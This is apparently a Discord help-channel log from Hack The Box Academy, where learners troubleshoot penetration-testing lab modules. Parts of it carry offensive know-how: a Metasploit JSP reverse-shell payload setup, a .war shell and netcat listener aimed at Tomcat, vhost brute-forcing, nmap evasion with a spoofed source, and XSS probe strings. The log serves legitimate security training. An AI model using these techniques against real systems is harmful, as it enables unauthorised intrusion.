I will check my notes

yeah for me the kerberos auth worked just fine, did you tried switching your vpn region?

Maybe you will need to call the support then

PLASE HELP

If you get the cert then certipy auth shoudl work with no problems

ok

State your module and section where you’re stuck

https://academy.hackthebox.com/module/144/section/1253

instead of pasting a link, write the module and section name + what you're stuck on

module 144 section 1253

why.

so that it's easier for everyone to know what exactly you're doing. some of us can't click the link because we might be using mobile

State the name of the module and section please

Module and section numbers don’t mean anything. And as calculac0re said, clicking on it on mobile is a pain

Information Gathering - Web Edition / Subdomain Bruteforcing

The command is right above the question. The wordlist to use too

Use that, it’s not a million entries

is not working for me i already do it but when it starts the reverse dns lookups i takes a lot, i have been more than 2 hours expecting for the result please help me this time with the answe

well 404 means something is catching, is the script.js in the same directory as your server?

it shouldn't take that long

my internet is working bad today please help

generally means one or more things you're doing is wrong

that's not anyone else's problem but your own

¯_(ツ)_/¯

but no one is gonna flat out give you answers

if your Internet is bad today, take it as a sign to just fuck off for the day and do something else

damn

i need advance for my school they ask me for these modules i cant just let it out

then talk to your school about it my guy ¯_(ツ)_/¯

The alternative is, instead of using your own vm -- use the in-browser vm

@storm elk dm

it'll be (relatively) faster

No, don’t dm me for help with modules please

good evening, guys

Hello

in the php server or the server im trying to break into?

the php server, same directory

no, i didn't see any instructions for that

that's how web servers work

It is a very simple exercise. You think I don't know how to do it. It is simply an internet problem and I don't understand why there is so much rudeness in giving a simple result, 0 identity of help.

i'm not saying anything about that

use the pwnbox if you REALLY have to get it done today

just make sure to disconnect from the vpn on your vm first

We shouldn’t hand the answer to you. We can tell you how to figure it out. But not do it for you

^

there's only a TINY handful of times where the answer might be given

and those times are when the module/exercise itself is broken

and not outputting what they want for the answer

if your internet isn't working, i'm not sure how you expect to do the rest of the sections, so giving the answer is out of the question

simple solution, use the pwnbox (in-browser vm) ¯_(ツ)_/¯

yes becuase the pwnbox is not internet-based

well

no

It doesn’t use your internet

it's that it's not dependent on YOUR internet

Only for Remote Desktop into it

even then in-browser works fine most of the time

Yes

should I just copy&paste into a vi document?

where did you save the script.js it had you make in the first place?

MY INTERNET IS WORKING FINE

i'd generally save any scripts in a ~/academy/scripts directory

then cp to /tmp/tmpserver when needed

you literally just said it wasn't

Then use it for the exercise with the wordlist given 🙂

^^^^^

Spoiler

yes thank you

it work s inside pwnbox

but not o ut

i never created one in this section, nor in the previous section

It should work outside too. Do you get any error?

well then it's something to do with your vm

¯_(ツ)_/¯

What error did you get? The wordlist can be in another location

likely was being throttled by something

you should

Or your isp might block you

and also in that case; yes vi it into a script.js

No. Just HtB vpn if it’s an internal ip

ok

I'm doing the shells and payloads assessment section question 2 and I started msfconsole again and I'm having trouble finding the right exploit. I know I had it yesterday. Also someone mentioned doing it in msfvenom. I believe it was marcielee

can someone point me in the right direction?

the cheatsheet is your friend here tbh

just note Tomcat uses jsp

ok so I got this far:

msf6 > search java/jsp_shell_reverse_tcp

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/windows/http/cayin_xpost_sql_rce  2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   1  payload/java/jsp_shell_reverse_tcp                         normal     No     Java JSP Command Shell, Reverse TCP Inline


Interact with a module by name or index. For example info 1, use 1 or use payload/java/jsp_shell_reverse_tcp

msf6 > use 1
msf6 payload(java/jsp_shell_reverse_tcp) > show options

Module options (payload/java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be s
                                     pecified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

msf6 payload(java/jsp_shell_reverse_tcp) > set LPORT 443
LPORT => 443
msf6 payload(java/jsp_shell_reverse_tcp) > set LHOST 10.129.204.126
LHOST => 10.129.204.126
msf6 payload(java/jsp_shell_reverse_tcp) > run
[-] Unknown command: run

msfvenom != msfconsole

java/jsp_shell_reverse_tcp is just a payload type

ok got it

ok I generated payload

now just have to upload it?

msfvenom is used with selected payloads and options to create a file that would be used to set a reverse shell (or do whatever is specified by that payload type/name)

yup :)

.war; what is it good for? ||breaking into Tomcat!||

is that hint something that I should look at?

and your just hiding it from everyone else?

no; just a joke about the file format that gets made

ko

oh I see because of the song

ok so I uploaded war file

make sure you start your listener

then just... go to that page :)

Is there anyone I can DM?

in Password Spraying - Making a Target User List, how is it that kerbrute is WAY faster on the parrot foothold than on kali via ligolo-ng?

is it because the tunnel is bottlenecking kerbrute?

Stuck on Establishing connection, please wait... in the Nessus section of the Vulnerability Assessment module — is this a reason to reset the target, switch PwnBox locations, or both?

I started the listener after making the war file and uploading it and navigated to the page and no reverse shell is popping up

┌─[htb-student@skills-foothold]─[~]
└──╼ $sudo nc -lvnp 443
[sudo] password for htb-student: 
listening on [any] 443 ...
^C
┌─[✗]─[htb-student@skills-foothold]─[~]
└──╼ $sudo nc -lvnp 443
listening on [any] 443 ...```

also for generating payload I generated shell.war with msfvenom

and uploaded it

it's because you're trying to route traffic through a tunnel, whereas the foothold has direct access

did you use the right LHOST?

172.x.x.x

ok hold on

also you need to visit the page to actually detonate it

thanks, thats what i thought!

I know I did

the LPORT is set to 443

and LHOST IP is target LHOST

172.16.x.x I know

I tried changing port to 8080 on both devices didn't work

both on netcat and on payload

there's something up with this

I tried with port 443 and port 8080

is there any way its possible since source and target port numbers are different that I'm missing the right port numbers?

Number 1 rule: always go back to nmap if you can't find the port a service is running on.

ok

but will nmap even help me at this point because it said port number in cheat sheet

so I'm really confused

Non-standard ports are going to be discovered if you use the -p- option. And if it doesn't discover anything, then might be time to reset the target.

You can DM if you want.

vi script.js and im back to square one where it just returns the 200 message and the other part doesn't get executed

will do thanks

let me just get some coffee

I have a couple of minutes

make sure no extra spaces

LHOST=<ip>,LPORT=<port> no space before or after =

this doesn't apply here

Well my comment about the Nessus module does.

even Nessus doesn't apply here

This one

the Nessus module has you connect to an https://ip:nessus_port; which has prefinished scans for you to search against

Yes, but it shouldn't freeze 2 seconds after logging in.

it's worked fine for me

¯_(ツ)_/¯

Been stuck on that for about 10 minutes now.

Resolved itself after I closed and reopened, then I accessed the Windows scan report and the same thing happened. "Establishing Connection" pop-up.

Connection picks up again, then hangs a minute later, then picks up again after that. Why the instability?

Change vpn regions and respawn target then

Also looks like you're using your windows main host to connect to htb, I would advise against that

If that's the pwnbox window re-establishing connection, then change pwnbox region

Damn, I can not understand the Pivoting, Tunneling, and Port Forwarding module at all.
For once I wish there was a video option on htb academy 😅

No I'm not. I'm using KDE Plasma 6 on Arch Linux (and I've also installed everything from the BlackArch repositories on top of it).

Still the main host, but not Windows.

you use system b as a way to get to system c

and allow your tools on system A to get to system C without needing to install them on system B

Figured it out, i didn't put new Image in the .js

Do you feel a little silly, a little stupid

my answer: yes

happens to everyone. it’s okay. 🙂

it's a learning experience

my general suggestion is, to keep any and all scripts they have you make in a folder named appropriately so that if you need to copy them to /tmp/ you can do so; and not have to rewrite every time

Yo

Can i get some help with Living Off the Land active directory enumeration and attacks. I cannot remote into the machine, I was able to one night but now i get incorrect password.

Used multiple tools, pwn box and my own machine. Same issue.

wrap password in single quotes, pray to the gods

ive saved the past two in my note pad

tried as well which requires me to escape the ! but even that doesnt work

careful saving things to notepad on windows

when i go through all the modules, im gonna go through them again to refresh

Kate is a better text editor than Notepad by a mile anyway.

if using rdesktop, set the domain to local ( .)

and i'm over here with my notes in obsidian

obsidian: there's a plugin for that

I should probably start using obsidian in prep for exam taking

i tried xfreerdp and rdesktop, rdesktop lets me get in and manually enter the password but says incorrect

Code Styler plugin is absolutely fantastic

set domain to .(local)

xfreerdp should work though

it did like 4 days ago, now it wont.

Looking for somebody who could provide some help for the Whitebox Attacks Client-Side Prototype pollution challenge. I have local XSS and know that I need to get the admin to promote through /admin.php?promote=2 but I cant get the click 😦

this doesnt work, is the syntax right?

rdesktop -u htb-student -p Academy_student_AD! -g 1024x768 10.129.91.172 -d .

incorrect password as well

i reinstalled all tools as well. I swear the password is just wrong

Sec I'm finishing something up and I'll check

Works fine on xfreerdp

I hit enter at the blackscreen and it works

Need to look into that. Still trying to find ways to optimize my vault. Currently fell in love with Make.md plugin

xfreerdp for me gets stuck on black screen and will never connect.

press enter

why not try remmina 👀

reinstalled it already twice

when you hit the blackscreen, just press enter

NAH

4 days for that

the best part you're not the first to run into this

discord search is a wonderful thing

ive never had to hit enter before. The amount of googling i did to find something

final hope was discord, thank you man

it's because it's failing to draw the AUP screen for corporate systems

still weird why rddesktop gave wrong password

but thank you i was losing my mind

yeah rdesktop is acting funky

I just got to my laptop and figured it out. It does not work on a mobile browser, even in desktop mode. Came right up on my laptop! 👍

in mobile, in the menu change the option to "desktop mode"

HTB isn't generally too mobile friendly

academy/main

Yeah for some reason that didn't work, no big deal though.

What are your thoughts on the Tier 3 modules? I've heard there's a new cert in the works, wondering if I should work on some Tier 3 now or wait and get a Gold Annual when the new cert drops.

I just did the math, all the Tier 3 hrs/days come out to just over 60 days! Looks like a lot of good content!

It's either that or go for OSCP, but I would rather stick with HTB at this point if there's a new cert in the works.

when i will have access to general?

when you read and follow the instructions in #welcome

done lol, thanks!

Just curious how many others here are using Linux as their host OS without any Windows instance whatsoever, and if that's a good idea for this.

You can make it work. Especially since Ubuntu is Debian so most of the tools might work. On TryHackMe they made a Kali Replica out of Ubuntu.

However, u will run into problems AND it will be a hassle to install some tools instead of just installing them the normal way on kali which is sudo apt install tool -y.

But on the plus side you dont have to keep swapping between your host and VM for notes and stuff, which in the long run makes you faster at hacking

Broken Authentication

Brute-Forcing Password Reset Tokens

I found the token, but it doesnt tell me which user I reset .. So I am just blindly fuzzing usernames into the login post...

Any help would be appreciated if u are available @fathom pendant

Just trying to review for the CBBH...

I'm using Arch with Plasma 6 and ran BlackArch's strap.sh tool after installing, then went on to loop through every blackarch-* package group to make sure I've installed everything — not sure how compatible that is with HTB's setup. What I find odd is the fact that although Nmap can connect to the target machine through OpenVPN, Chrome can't — anyone else having that problem?

Try using a proxy

And while ur at it run that proxy through burp cause ur gonna use it a lot

I'll see what ZAP can do; should be an interesting config journey.

I gave ZAP a try several times but I couldnt make it as good as burp

I believe I found another mistake in the cme module@fathom pendant
May I dm you, so I don't spoil it here

I truthfully haven't done that module but throw in #1234357888114364508

okay

Haven't touched that module

Yeah.... Nothing.... Went through the whole thing to check and nothing. No rational explanation...
This happened over the spawn of a couple of hours

Well I decided to use the NetworkManager OpenVPN plugin on my host and now it just does this.

This is going to make it much easier to switch VPNs from here on out, at least.

Yeah idk why you'd do that

How would it make it easier? Whenever you switch vpn regions you need to regenerate a new vpn config

Unless you have it doing voodoo magic to download the new one

Sounds like you messed something up

Check your /etc/resolv.conf

First rule of tech, if it ain't broke, don't fuck with it.
Second, if you already see duct tape on it, also don't touch it

I need a hint for the Advanced XSS and CSRF skill assessment. ||I have gotten to the API and found that there is some kind of database being queried||

DACL 1. Section : Granting Rights and Ownership. Last question.

general question is crackmap like outdated now? or better tools have replaced it?

netexec

NetExec is a fork of CrackMapExec maintained by the people who were maintaining it while it was still CME

it's virtually the same program, just with a different name

i see

My notes say you need to abuse the owner privs at the chap user, after that do a targeted kerberoast to get the pass

Hi can anyone explain how this is evasion

Sudo nmap -sV --top-ports 10 --disable-arp-ping

This is the answer for the easy lab

Information Gathering - Web Edition
MODULE 144 SECTION 1257 what is the target the generated by htb or inlanefreight.htb

Hey @gilded radish I noticed you had the same problem ad me in ur message https://discordapp.com/channels/473760315293696010/774040263278592041/1270748145520869480 when I bypassed the 301 with a 200 OK it just gave me a blank page

probably shouldn't be posting answers to skill assessments in here

Hey Marcie I tried a bypass to 200 OK from 301 intercepting the response but it just gives me a blank page... Is it the lab or is it me?

Broken Authentication Assessment

you should delete your posts referring to the skill assessment, those are spoilers

Section number doesn't help

Because

1. You're only scanning the top 10 ports, which means it'll be less noticeable to IDS systems

2. You're disabling ARP requests. Some security systems may detect and block ARP requests, flagging them as suspicious. So Nmap skips this step, potentially avoiding detection by systems that monitor ARP traffic. Instead, it relies on other methods to detect if the host is up, like TCP or ICMP pings.

THEN

OMG PLEASE HELP

└──╼ $sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
[sudo] password for parrot:
/usr/bin/python3: No module named uploadserver
-- I am struggling on using python3 in some of the modules turns not found. any tips. (using parrot os)

What's the section name? And more often than not the vhost is given above the questions, to be used with the spawned ip

Not found == install with pip

pip3 install uploadserver

When it says not found, it means the module isn't installed

VIRTUAL HOSTS

Chill with the caps dude

SORRY IM MAD

Not our concern

Well yelling won't get you help

ok

I'm mad that I'm getting pinged while I'm trying to sleep

getting mad over learning? chill.

omg i will not response to that

Anyway, your question barely made sense

not actually mad just have the caps on

I wanted to use pip3 (not pipx)

Read the bottom of that message

i still waiting for help

i also created virtual envi for that and run inside it. may be i will try again.

Well being clearer with your question will get you better help. Idek what you're asking

There's more to that message

In key part; --break-system-packages

for the tasks in this module what is the target the generated the one spawned for htb (random docker ip and port) or inlanefreight.htb ? @fathom pendant

You can also delete the EXTERNALLY-MANAGED file in the python install

And I answered

It's both

inlanefreight.htb is the vhost used on the public ip:port

Which you put in your /etc/hosts file as
ip inlanefreight.htb

Then in your browser http://inlanefreight.htb:port

It's important that you don't put the port in the hosts file

@fathom pendant thank you!

If you utilized discord search, or your brain, you'd figure it out

but if I don't specify the port it will try port 80 and the common ports how will it know which port it spawned?

No

You specify the port in your requests

oh ok

Such as my example above in a browser

Please do not be disrespectful by saying that I do not use my brain. Simply, nowhere in the room do they tell you that you have to modify the etc/hosts file,

that's because it's fundamental knowledge

each module can't go over the very basics of computer operation each and every time, that'd make the modules too long and complicated

Section* not room

seems all good now with pip3 install uploadserver --break-system-packages . I also able to run uploadserver w/out python3 -m .

they assume you have a certain base level of knowledge

Ok well but then tell me once and for all if I can't make a mistake, you are belittling me and disrespecting me just for not knowing that I had to edit that file

how did i belittle or disrespect you?

I'm being a dick because you're being demanding of help

But even if it's not shown in that section; you can probably search the discord for similar queries

Ok that makes so much more sense

Thanks alot bro

Ok, I won't ask anything here again because they only answer me with their egos assuming that I don't know something basic when I simply didn't understand what the module was referring to with the question because I'm not used to using HTB

i didn't assume anything, you said the module didn't tell you that you need to modify /etc/hosts. i just told you why it didn't tell you that. that's not belittling you.

Each tool has a different use and syntax, it is not rocket science so that I can say that in the module indication it is very clear that what I should change is the etc/hosts file for local DNS resolution, although I know what it is, I simply wanted to be clear about what was being asked, and to be called someone who dont uses their brain for a question that is not stupid is simply a senseless attack.

Again, my response was mostly because you were being demanding of attention

Now I have learned it and believe me I will not forget it. I will modify that when htb has a similar question, but it is the way of saying things.

And as an FYI, earlier you didn't say the section name

Just section number

which doesn't help

Yes, I'm sorry, I just expected a little more maturity and respect from you.

Thanks for helping me with the question, I will continue studying!

i mean, if you can't resolve the host name.. it's dns.

I respect those who show they can be respectful

You coming in all-caps immediately dropped a lot for me

That wasn't even my question

His question was; is the spawned ip:port the target, or inlanefreight.htb

i already knew that

Isn't inlanefreight.htb the target?

i wasn't talking to your question, you had said the module didn't even tell you to edit /etc/hosts, i simply stated it's not going to mention it because it's prerequisite knowledge you must have before attempting that module. i never said anything disparaging about you.

you seemed pretty upset about it so i was just trying to give you insight as to why it's not mentioned.

It's both

:p

It's the same

Exactly

IP:port is the same as inlanefreight.htb

I mean not always

Depending how the vhost is set up

Yeah

During evasion how to know which source IP u can use cause we need a live one

Yes, my friend, just that you assume that I don't know DNS because I didn't edit a file that I didn't know I should edit simply offended me, I've been with tryhackme for a year and I know the basics well, it's just that now I'm learning with hackthebox and I'm not used to their questions, and I understand that it's a prerequisite to know that, it surely came up in some introductory module to HTB.

You don't need to worry about that tbh

As spoofing the IP won't yield anything useful

I tried this command nmap 10.129.64.118 -F -sA -Pn -n --disable-arp-ping -S 10.129.64.112 -e tun0

Failed to determine route to target

That's what error I got

Because you're trying to set your source IP to the target IP

You don't need the -S argument

can i ask a question?

Also if you're just copy/pasting from the module it just won't work

https://dontasktoask.com

I just want to know, why was it necessary to map the IP address to the domain name and it didn't work just by putting the IP address?

Regarding the same exercise I asked a while ago

Certain services, like Web Servers for example can host multiple "virtual hosts" under the same IP address. When connecting, clients can include in their request the "hostname" (domain) they want the request to be passed to.

Without a hostname being provided, the server may not know where to route the request, and may fall back to a default configuration, which for most web servers is a generic "this is apache", or "this is nginx" page.

Think of it as a block of flats. The flats all exist in one building, but that building has multiple doors. You could post mail to the property that contains the flats, but without providing a door number, where would the mail go?

Thank you !

ok so for the same address the web server relies on the domain name http request header section in such a way that each domain name can return unique responses regardless of whether the request is directed to the same ip address and each domain name (with unique response) can have its own subdomains, but as such these attempted subdomains are not virtual addresses but belong to the classification of its parent domain name

i understand it good? @ocean night

That is correct, but rather think of domains and subdomains as separate entities for the most part

Some services use subdomains to define a users page, e.g. <username>.domain.com, which are technically routed through the same service, but using the subdomain as a variable internally

Fun stuff

The hostname is used by the webserver to determine where to pass the request internally, whether that be to an appliance running on something like PHP, or to a directory with just plain HTML

Another analogy.. a house, multiple people live in it. Mail is received with just the address, no name.. who gets the mail?

Shut up and go to bed g0blin

I just woke up 😅

Ok thank you very much @ocean night , everything is much clearer to me now!

I think a good example of this is the common applications module where most of the hosts have the /var/www/<vhost>

Where each vhost [or set] has their own service[s] on them

that main domain name had to be enumerated before you knew about it right?

If you only have the IP

More often than not, htb provides the domain name, or sometimes visiting the ip might be a message, [base website for <domain>]

Or in the case of boxes on the main site, the way that it's set up is that visiting the ip forwards to the domain (even if it's not in your /etc/hosts, it just won't load in that case)

Usually when simulating an external website, htb will use the .htb tld, and if simulating an internal website they'll use .local

But you will almost never be thrown at it without something

The exercise was not then about searching for virtual hosts but about searching for subdomains of an already known virtual host

Yup

One addendum, again a subdomain is also a virtual host, regardless of how the backend handles the sub part of the domain 🙂 Web servers have a default request handler, which can be used to host traffic for a domain just by having it either be the only rule for handling requests, or having a domain served as the default as a fallback if no matching virtual host rule is found in the config.

makes sense, interesting

Good Ole DNS records

The bane of many

Password Attacks - Password Attacks Lab - Hard

Hello, I need help.

I managed to find the creds for the backup file, which I put in the Windows machine to be able to mount it. But I don't know how to put it in the right directory to mount it. It's in a share smb. And when I try to move it to “This PC”, I can't do it.

Do you know how I can do it?

Is it only me or has the target spawning and performance been a real pain in the ass these past few days? Have to wait like 15-20 minutes for a target to spawn

And if it includes mounting nfs, takes me a solid few minutes to even get the content

I have 500 mb/s upload and download

I dont have issues spawning atm, maybe ty a different region?

question about enumeration tools like LinEnum and linuxprivilegechecker:
of course these tools may make a lot of noise as mentioned, but how would one even use these tools on a compromised system to enumerate it? is there some way to transfer them to the compromised system? feels like im missing something

(im on the getting started module of cpts -> privilege escalation)

Still having this problem. Why is Chrome unable to see what nmap can?

It looks like a proxy, so it probably doesn't have any data to serve to you. It's role is to proxy traffic and has no content for you

This is supposed to be the OpenVAS lab.

what module and section?

108/1516

State the names please

Note: It may take 1-2 minutes for your target instance to spawn.

This could be why

It's been 5 minutes and the target IP wouldn't be up if it was still waiting to spawn.

Already stated before: OpenVAS SA

Again, here's the problem with it. Note that nmap says that the OpenVAS port is open from my host system. So why is Chrome unable to access OpenVAS despite this?

And no, attempting to tunnel all traffic through ZAP is of no help either.

You're using your own box for the labs and not the VM provided?

I'm using OpenVPN, and yes because PwnBox has been very fickle on me when it comes to performance.

Hold on, let me see how Parrot is able to do it — maybe I can pilfer some settings off of the PwnBox to use locally so I don't have to keep spawning every 2 hours.

Yea, I've battled with both to be honest, there is no real clear winner. I'm just testing now with their VM and it let me in with : https://10.129.147.223:8080/login

the windows command line module is a tad bit easy

going to try and rush through this

not getting any hit for this "Virtual Hosts"

vHosts needed for these questions:
inlanefreight.htb

• 1 Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"

$ gobuster vhost -u http://94.237.59.199:47322 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Even pilfering the /etc/resolv.conf from the PwnBox and using it on my local machine was of no help. I'm seriously at a loss at this point when it comes to forcing the GUI and CLI to see the same traffic.

Which module / section in specific is this @sinful narwhal ?

..and is that the exact command you ran?

Information Gathering - Web Edition
Page 9
Virtual Hosts

Ok, one moment.

That's a Tier 2 module, so no public spoilers please anyone. I'll DM you @sinful narwhal

ok sure

I run these workdlists but no luck

/usr/share/wordlists/dirbuster/directory-list-1.0.txt
/usr/share/seclists/Discovery/Web-Content/common.txt

on 94.237.59.199:47322

Yup, it's fine - I'll try and guide you, I know the problem.

You need a domain for it to append

The domain, in this case, is the vhost given

It's ok marcie

I'm chatting with them 🙂

Thanks though

Ah

Wasn't caught up after my nap

Stress causing my sleep rhythm to change a lot lol

mmhm

I know that one, hope you get back in to a pattern soon

Well once everything is set for the move itll have to be

Moving far?

...not that it matters.. I once moved four houses down.. it was still a pain in the butt

Oh, 🤦🏼‍♂️ I can't believe the solution to the OpenVAS problem was as obvious as realizing it doesn't redirect to SSL like everything else.

After going through the pain of having installed Arch enough times to have written a script for automating the reproduction of your entire setup, sometimes it's the little things that get you.

Yup

It do be like that

https://tenor.com/view/asdf-asdfmovie-i-can't-read-i-cant-read-punished-lion-gif-3532527054645921660

@jagged viper

Where in the module does it mention what I learned the hard way about this? Happened to have used OpenVAS before as part of the CEH labs, so that's why I just skimmed through the documentation in the module (though I do like to PDF-scrape everything to make it easier to go back to after the module is complete — hold on).

Alright, I do see now at the very bottom of the page that it specifically mentions https://<IP>:8080/ — still, most of us take for granted these days that things redirect to https from http. Submitting a ticket to have them add a warning about this.

Alright, rant over — sorry for the walls of text.

You can raise any issues or concerns regarding modules in #1234357888114364508 @foggy monolith 🙂 The team check them all.

ok

ive been here for 4 years wheres my promotion

false, it says you joined dec 13th with is less than 3 years. no promotion.

Check #welcome for verification of your Discord account with your HTB account at https://app.hackthebox.com - that'll let you post in the other channels

Done.

heh, first time I've encountered this on the Academy!

I wonder why this particular module is upsetting it but none of the other Windows modules have

In Web Attacks: Bypassing Encoded References

I was able to get the flag by using Burp Intruder. However, I don't understand why can't i download the files? I can only download files if i visit the same link via a browser.

2nd question:

While looking at the response from Burp Intruder, I can see the flag in plain text, however, the response i get from the browser request is base64 ecoded. Why is that?

Hello Everyone 👋🏻
I am leraning web proxys, more specific, web fuzz with burp suite, when I am attacking, the results page is keep closing after getting a peompt for commercial edition
Is the problem from my configuration, or got a new update?

The Community Edition is simply much slower. But fuzzing should work

Hi, everybody. I need some help!!! I can't solve Lab (Module:FileUploadAttack:Client-Side Validation) I changed the HTML code but still it doesn't work, how can I solve it?

^^

Yes, as I said, it's much slower. But should work

what do I have to use to get the flag?

When I am clicking ok it is closing

Where can I see the progress if it is working?

Ah okay got it, the end line

i forgot how to connect to RDP, was it SSH username@IP then PW, but why do i get connection refused?

Wym?

I use xfreerdp /u: /p: /v:<ip>

The ssh format is correct

look at all you freshies lol

i've been in this server longer than all of you. So take a step back.

My bad group leader🙏

Might wanna check out #welcome and validate then 😉

Generic Question:

I added VHosts to my /etc/hosts file. The websites are available by browsing via web browser. When I try to use commandline tools like curl, i get a "could not resolve" error. Do I need to add an specific option to curl, that he uses my /etc/hosts file to resolute the name of the website.

How to get the flag here?

u cant submit the answers here delete the flag from here and ask the support via the htb logo in bottom right in the academe

just make sure there is no spaces on the begging or at the end

you need to fuzz: http://host:port/admin/FUZZ.html

So, you're back after 4 years, how has life treated you @lunar prawn ? Gonna get back in to HTB, or just here for fun?

here for fun

Fair enough - please verify your account and move to #general then

This channel is for discussion of Academy modules

thank you there must been a wrong char in the copy - mostlikely a space 😫

ull get used to it

hehe 😄

Hello

I was a little at a loss

Hello ？

@fathom pendant

hey bro can you help me
HTTPS/TLS attack skill assessment
cannot decrypt cookie in plaintext

Got not found

@spare stone use seclists for that

Common.txt?

And, even it is burp suite task, I would not recommend you fuzzing it with community edition of burp, it will take forever. Use ffuf for that

Discovery - Web-Content

smth that I believe, don't remember

What's the module and section name bro

Web proxy, burp intruder

DM

@gilded radish how to ffuf for that

look for commands in google

add *.hackthebox.com/* to trusted urls (in safe browsing), most AV i used so far will at one point or another flagged HTB stuff but it's just false positive

gg

you should delete this msg from here

cheers not a bad idea, and yeh I know it's a false positive just find it funny this is the first module it's flagged for me given content of others 😄

btw, yeah delete that

well, htb actually teach you offensive things.

I almost had a heart attack once when I was taking notes, and Windows Defender said I had a virus on my main host.

I think it's very interesting

If you have any difficulties, it is advisable to google it first and take a look at HtB's posts, and the predecessors of history will give you hints

As well as historical messages from discord, which I find helpful

with windows fundimentals where do i put Get-WmiObject -Class win32_OperatingSystem

That part

powershell

whats the difference between powershell and bash

is powershell to interact with the remote connection?

bash is lunux thing, while powershell is for windows

you can google what the diff

should i have xfreerdp with powershell instead of basg

bash*

@spare stone please don't post spoilers in the channel 🙂 Unsure which module you're on, but anything that is higher than Tier 0 should not have any spoilers posted in the open. Thanks

Deleted the message, just in case.

Hi all, for the web attacks Bypassing Basic Authentication module I'm having trouble getting the server to return the allowed HTTP methods using curl -i -X OPTIONS http://IP:PORT/ as suggested in the module. My output isn't returning the Allow: header, any advice please?

└─$ curl -i -X OPTIONS http://83.136.255.40:37040/          
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 12:04:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1108
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>File Manager</title>
    <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.3/css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.3/css/bootstrap.min.css">
    <script src="//netdna.bootstrapcdn.com/bootstrap/3.0.3/js/bootstrap.min.js"></script>
    <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
    <link rel="stylesheet" href="./style.css">
</head>

<body>
    <div class="form-group">
        <h1>File Manager</h1>
        <form role="form" action="index.php" method="GET">
            <input type="text" class="form-control" placeholder="New File Name" name="filename">
        </form>
        <form action="admin/reset.php" method="GET">
            <input type="submit" value="Reset" class="btn btn-danger" />
        </form>
    </div>
</body>
</body>

</html>

<div></div><ul class="list-unstyled" id="file"><div><h3>Available Files:<h3></div><ul><li><h4><a href='notes.txt'>notes.txt</a></h4></li></ul></ul> 

I know I can just brute force try all options but confused as to why the OPTIONS request isn't working?

Haven't run the module but had similar problems when doing my OSCP. Are you using rdesktop, xfreerdp or anything similar?

Option means you have to choose which method are you gonna use
weather POST HEAD PUT or others

in the module it shows the following example though:

curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date: 
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

This implies you can use curl -i -X OPTIONS http://server:port/ to see the Allow header, is this not correct?

at the place of OPTIONS you have to choose method
GET or POST

it is just an example

that's quite confusing, the module wording implies we can send an OPTIONS request specifically to identify the allowed methods :/

even in the table at the start of the module it specifies that:

https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS also implies this should work

@night crypt The example in that section is valid, but not all web servers / web applications implement this feature since it's not mandatory.

does juicy potato need both SeImpersonate & SeAssignPrimaryToken or either one of them to get SYSTEM access

Afaik the ad module only states SeImpersonate, but nothing is stopping you from looking at the docs

Windows Privilege Escalation >> Credential Hunting = Search the file system for a file containing a password. Submit the password as your answer. any hind for this question? i used all the cheatsheet and some github methods.

Got a problem in zap scanner, who can help me?

hey someone at successed this module with msf ? https://academy.hackthebox.com/module/113/section/1208

yes

my output :

i've the username and password

I also specify the vhost

thanks, that makes sense just found it odd that the example exercise in that module wouldn't show it. Is it generally considered best practice to either implement the feature or not, or is it really case specific?

🙂

try this one

easy mate

i do it

Considering the OPTIONS verb is heavily used for CORS preflight requests it makes sense to implement it / keep it active.
It does not use the Allow header though, so the behavior might be different.

thanks Ryuki!

How long should it take to enumerate ACL for a said user in AEAD module?

Been going for 10+ minutes

It depends how big it is. How many users are there ?
(Get-NetUser).count

I am sorry, I am not aware of it

Hi. DACL 1. Skill Assessment. Last question, I have ntlm hash of jose and jeff but they don't work for anything. Help please.

I have a question that i have completed starting point tier 0 tier 1 tier 2 now what should i need to do i am completely begginer

Took 30 min

Anyone ever nest tmux sessions and can't vertical split the window, but horizontal splitting works fine? 🤨
LINUX01 Host in Password Attacks > PtT from Linux acting in a novel way for me.

It's the little things that will eventually me push over the top.

Hey cross site scripting module the session hijacking part im stuck i cant find the field and xss payload to use

hi guys i have a question in shells & payloads Infiltrating Unix/Linux can anyone help?

Anyone any help?

Do what the module suggests and have it call to your ip with the name of the field you're testing [your_ip:port/username]

Also try different methods

'>
">

You're gonna need to tinker and figure it out

I may be able to assist. What is the question. DM's are open if it's spoiler material.

I'm following the SQL Injection course, but I got stuck at the Subverting Query Logic section. In particular, I'm stuck at answering the question because I can't connect to the MySQL server. When I'm prompted for the password and I input it, the command just hangs and eventually times out. When I try connecting with the URL listed in the cheatsheet I get the error ERROR 2005 (HY000): Unknown server host '<docker host>' (-2). I can't see the password anywhere, but in previous sections it was just password so I'm assuming it's the same here.

This is a web application. You're not supposed to use mysql

thank u i have figure it out, thank u so much

but how do i access the web application?

Http

:)

Firefox

i figured thanks

://

ofc

Well that's in a browser

Firefox?

Ye

You know, the web browser

Ik

http://

which web shells section should I reread before attempting host 2 on the assessment section for shells and payloads module?

should I just reread PHP web shells or are other web shells sections worth rereading too?

Host 2 is the blog.inlanefreight one yeah?

Or is that the Tom one

blog.inlanefreight one

I completed the Tom one already

There's not much to read about to be honest

Just inspect the page for the technologies in use

ok thanks

